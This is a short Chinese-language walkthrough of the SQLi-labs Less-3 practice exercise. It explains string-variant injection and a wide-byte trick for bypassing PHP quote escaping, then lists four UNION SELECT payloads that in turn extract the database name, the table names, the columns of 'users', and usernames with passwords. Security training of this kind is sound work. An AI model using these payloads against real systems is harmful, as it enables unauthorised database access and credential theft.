Less-3错误型GET单引号变形字符型注入
什么是sql变形字符串注入?最常见的有:
1、将查询条件转为base64
2、本实验用)
来实现变形;
3、宽字节字体编码利用,例如gbk中文字符,这种比较难用;例如试图用%df%5c%27
试图在%df%5c%27
为中文字符绕过%27
PHP魔术引用的转义成\%27
但也要取决于环境;故此宽字节去做sql注入的转义绕过很难。
实验漏洞复现介绍
该实验与Less-2错误型GET整型注入
区别在于,构建payload新增')
单引号;)
表示变形!
1、爆开数据库
payload
?id=0') union select 1,2,database() --+
2、爆开数据表
payload
?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
3、表开数据列(字段)
payload
?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
4、爆开数据值
payload
?id=0') union select 1,group_concat(username,0x3a,password),3 from users--+